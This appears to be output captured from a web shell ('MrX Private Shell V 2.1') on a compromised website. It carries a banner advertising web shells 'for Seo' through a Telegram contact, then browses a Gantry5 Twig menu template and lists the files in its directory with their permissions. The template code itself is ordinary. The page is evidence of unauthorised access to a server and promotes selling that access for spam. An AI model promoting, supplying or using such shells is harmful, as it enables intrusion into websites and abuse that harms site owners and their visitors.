__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<section
{%- if particle.css.id %} id="{{ particle.css.id }}"{% endif %} class="menu-selector-bar{%- if particle.css.class %} {{ particle.css.class }}{% endif %}" role="navigation">
<ul class="g-grid g-toplevel menu-selector" data-mm-id="" data-mm-base="" data-mm-base-level="1">
{% for child in item %}
{% set is_particle = child.type == 'particle' or child.type == 'module' %}
{% set active = (child.path|split('/')|first) == (path|split('/')|first) ? ' active' : '' %}
<li data-mm-id="{{ child.path }}"
data-mm-level="{{ child.level }}"
{% if is_particle %}
class="g-menu-removable g-menu-item-{{ child.type }}{{ active }}{% if child.options.particle.enabled == false %} g-menu-item-disabled{% endif %}"
data-mm-original-type="{{ child.type }}"
{% else %}
class="{{ active }}{% if child.enabled == false %} g-menu-item-disabled{% endif %}"
{% endif %}
>
{% include 'menu/item.html.twig' with {'item': child, 'target': 'columns' } %}
</li>
{% endfor %}
</ul>
<a class="global-menu-settings" href="{{ gantry.route('menu/edit', id) }}">
<i aria-label="{{ 'GANTRY5_PLATFORM_MENU_GLOBAL_SETTINGS'|trans }}" class="fa fa-cog" aria-hidden="true"></i>
</a>
</section>
<div class="column-container" data-g5-menu-columns="">
{% if columns %}
{% include 'menu/columns.html.twig' with {'item': columns } %}
{% endif %}
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| base.html.twig | File | 1.53 KB | 0664 |
|
| columns.html.twig | File | 909 B | 0664 |
|
| empty.html.twig | File | 195 B | 0664 |
|
| item.html.twig | File | 1.6 KB | 0664 |
|
| list.html.twig | File | 1.6 KB | 0664 |
|